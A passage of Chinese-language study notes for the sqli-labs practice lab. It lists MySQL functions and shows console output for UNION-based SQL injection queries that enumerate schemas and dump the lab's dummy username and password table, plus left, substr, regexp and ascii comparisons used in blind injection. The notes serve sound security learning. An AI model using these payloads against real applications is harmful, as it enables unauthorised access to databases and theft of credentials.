sqli-labs闯关笔记-mysql常用函数-1
system_user()
mysql> select system_user(); +----------------+ | system_user() | +----------------+ | root@localhost | +----------------+ 1 row in set (0.00 sec)
user()
mysql> select user(); +----------------+ | user() | +----------------+ | root@localhost | +----------------+ 1 row in set (0.00 sec)
current_user()
mysql> select current_user(); +----------------+ | current_user() | +----------------+ | root@localhost | +----------------+ 1 row in set (0.00 sec)
database()
mysql> select database(); +------------+ | database() | +------------+ | security | +------------+ 1 row in set (0.00 sec)
version()
mysql> select version(); +-----------+ | version() | +-----------+ | 5.7.26 | +-----------+ 1 row in set (0.00 sec)
@@datadir
mysql> select @@datadir; +----------------------------------------------+ | @@datadir | +----------------------------------------------+ | D:\phpstudy_pro\Extensions\MySQL5.7.26\data\ | +----------------------------------------------+ 1 row in set (0.00 sec)
@@version_compile_os
mysql> select @@version_compile_os; +----------------------+ | @@version_compile_os | +----------------------+ | Win64 | +----------------------+ 1 row in set (0.00 sec)
group_concat
group_concat([DISTINCT] 要连接的字段 [Order BY ASC/DESC 排序字段] [Separator '分隔符'])
mysql> select * from users where id =-1 union select 1,2,3; +----+----------+----------+ | id | username | password | +----+----------+----------+ | 1 | 2 | 3 | +----+----------+----------+ 1 row in set (0.00 sec) mysql> select * from users where id =-1 union select 1,2,group_concat(schema_name) from information_schema.schemata; +----+----------+-----------------------------------------------------------------+ | id | username | password | +----+----------+-----------------------------------------------------------------+ | 1 | 2 | information_schema,challenges,mysql,performance_schema,security | +----+----------+-----------------------------------------------------------------+ 1 row in set (0.00 sec)
CONCAT_WS(separator,str1,str2,…)
CONCAT_WS() 代表 CONCAT With Separator ,是CONCAT()的特殊形式。第一个参数是其它参数的分隔符。分隔符的位置放在要连接的两个字符串之间。分隔符可以是一个字符串,也可以是其它参数。如果分隔符为 NULL,则结果为 NULL。函数会忽略任何分隔符参数后的 NULL 值。但是CONCAT_WS()不会忽略任何空字符串。 (然而会忽略所有的 NULL)。
mysql> select * from users where id=-1 union select 1,2,concat_ws('~',username,password) from security.users; +----+----------+---------------------+ | id | username | password | +----+----------+---------------------+ | 1 | 2 | Dumb~Dumb | | 1 | 2 | Angelina~I-kill-you | | 1 | 2 | Dummy~p@ssword | | 1 | 2 | secure~crappy | | 1 | 2 | stupid~stupidity | | 1 | 2 | superman~genious | | 1 | 2 | batman~mob!le | | 1 | 2 | admin~admin | | 1 | 2 | admin1~admin1 | | 1 | 2 | admin2~admin2 | | 1 | 2 | admin3~admin3 | | 1 | 2 | dhakkan~dumbo | | 1 | 2 | admin4~admin4 | +----+----------+---------------------+ 13 rows in set (0.00 sec) mysql> select * from users where id=-1 union select 1,2,group_concat(concat_ws('~',username,password)) from security.users; +----+----------+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+ | id | username | password | +----+----------+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+ | 1 | 2 | Dumb~Dumb,Angelina~I-kill-you,Dummy~p@ssword,secure~crappy,stupid~stupidity,superman~genious,batman~mob!le,admin~admin,admin1~admin1,admin2~admin2,admin3~admin3,dhakkan~dumbo,admin4~admin4 | +----+----------+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+ 1 row in set (0.00 sec)
当前数据库是security,下面测试都是基于security数据库的。
left,regexp,like,substr,ascii,chr
left()函数: left(database(),1)=‘s’ left(a,b)从左侧截取a的前b位,正确则返回1,错误则返回0
regexp函数:select user() regexp ‘r’ user()的结果是root,regexp为匹配root的正则表达式
like函数: select user() like ‘ro%’ 匹配与regexp相似。
substr(a,b,c) select substr() XXXX substr(a,b,c)从位置b开始,截取a字符串c位长度
ascii() 将某个字符串转化为ascii值
chr(数字) 或者是ord(‘字母’) 使用python中的两个函数可以判断当前的ascii值是多少
对于security数据库:
select left(database(),1)=‘s’; 前1位是否是s
select left(database(),3)='sec';前三位是否为sec,是的话返回1,否则返回0。
mysql> select left(database(),1)='s'; +------------------------+ | left(database(),1)='s' | +------------------------+ | 1 | +------------------------+ 1 row in set (0.00 sec) mysql> select left(database(),1)='a'; +------------------------+ | left(database(),1)='a' | +------------------------+ | 0 | +------------------------+ 1 row in set (0.00 sec)
select database() regexp ‘s’; 匹配第一个字符是否是 s
select user() regexp 'root';匹配返回的结果是否为root,正确返回1。
mysql> select database() regexp 's'; +-----------------------+ | database() regexp 's' | +-----------------------+ | 1 | +-----------------------+ 1 row in set (0.00 sec) mysql> select database() regexp 'a'; +-----------------------+ | database() regexp 'a' | +-----------------------+ | 0 | +-----------------------+ 1 row in set (0.00 sec)
select database() like ‘s%’; 匹配第一个字符是否是 s
mysql> select database() like 's%'; +----------------------+ | database() like 's%' | +----------------------+ | 1 | +----------------------+ 1 row in set (0.00 sec) mysql> select database() like 'a%'; +----------------------+ | database() like 'a%' | +----------------------+ | 0 | +----------------------+ 1 row in set (0.00 sec) mysql>
select substr((select database()),1,1)='s’; 匹配第一个字符是否是 s
mysql> select substr((select database()),1,1)='s'; +-------------------------------------+ | substr((select database()),1,1)='s' | +-------------------------------------+ | 1 | +-------------------------------------+ 1 row in set (0.00 sec) mysql> select substr((select database()),1,1)='a'; +-------------------------------------+ | substr((select database()),1,1)='a' | +-------------------------------------+ | 0 | +-------------------------------------+ 1 row in set (0.00 sec)
select substr((select database()),1,3)= ‘sec’; 匹配前三个个字符是否是 sec
mysql> select substr((select database()),1,3)='sec'; +---------------------------------------+ | substr((select database()),1,3)='sec' | +---------------------------------------+ | 1 | +---------------------------------------+ 1 row in set (0.00 sec) mysql> select substr((select database()),1,3)='abc'; +---------------------------------------+ | substr((select database()),1,3)='abc' | +---------------------------------------+ | 0 | +---------------------------------------+ 1 row in set (0.00 sec)
select ascii(substr((select database()),1,1)); 直接回显115 或者是:
mysql> select ascii(substr((select database()),1,1)); +----------------------------------------+ | ascii(substr((select database()),1,1)) | +----------------------------------------+ | 115 | +----------------------------------------+ 1 row in set (0.00 sec)
select ascii(substr((select database()),1,1)) > 110; 如果大于110,就会返回1,否则返回0.
mysql> select ascii(substr((select database()),1,1))>110; +--------------------------------------------+ | ascii(substr((select database()),1,1))>110 | +--------------------------------------------+ | 1 | +--------------------------------------------+ 1 row in set (0.00 sec) mysql> select ascii(substr((select database()),1,1))>115; +--------------------------------------------+ | ascii(substr((select database()),1,1))>115 | +--------------------------------------------+ | 0 | +--------------------------------------------+ 1 row in set (0.00 sec)
mysql> select ascii('s'); +------------+ | ascii('s') | +------------+ | 115 | +------------+ 1 row in set (0.00 sec)
